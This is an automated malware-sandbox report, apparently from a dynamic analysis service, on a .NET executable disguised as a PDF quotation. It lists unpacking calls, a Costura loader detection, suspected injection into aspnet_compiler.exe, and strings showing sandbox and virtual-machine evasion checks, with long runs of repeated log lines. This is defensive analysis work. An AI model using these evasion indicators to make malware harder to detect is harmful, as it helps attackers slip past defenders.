Source:	Binary string: protobuf-net.pdb source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, -.cs	.Net Code: _E000 System.AppDomain.Load(byte[])
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a0bdc0000.1.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a0bdc0000.1.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a0bdc0000.1.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a0bdc0000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a0bdc0000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26290000.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a26210000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d63fc80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1934071386.0000017A26210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe PID: 7264, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887B0091A push dword ptr [esi-17000000h]; ret	0_2_00007FF887B00923
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887AFF90E push dword ptr [eax-16FFFFFFh]; iretd	0_2_00007FF887AFF917
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887C306BD push es; ret	0_2_00007FF887C30712
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887C30673 push es; ret	0_2_00007FF887C3067A
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887C30E63 push cs; ret	0_2_00007FF887C30E6A
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887C335B5 push eax; ret	0_2_00007FF887C33609
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887C30D69 push cs; ret	0_2_00007FF887C30DCA

Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a260a0000.8.raw.unpack, s519TZrCDsCgOb8hLYv.cs

High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'BSorWVxix7', 'NtProtectVirtualMemory', 'VnNMT040cnrMUOIG2LO', 'BRZLuS4hENdEN4as50G', 'IpS7574gGqj5Akeiks8', 'gOtUWX44VVXcHmI3ejJ'

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORERESBIEDLL.DLLFCUCKOOMON.DLLGWIN32_PROCESS.HANDLE='{0}'HPARENTPROCESSIDICMDJSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREKVERSIONLSERIALNUMBERNVMWARE\|VIRTUAL\|A M I\|XENOSELECT * FROM WIN32_COMPUTERSYSTEMPMANUFACTURERQMODELRMICROSOFT\|VMWARE\|VIRTUALSJOHNTANNAUXXXXXXXX

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Memory allocated: 17A0BB40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Memory allocated: 17A255A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1AE6AD60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1AE6AEF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599714	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599356	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599084	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598071	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596853	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596727	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596279	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595442	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594547	Jump to behavior
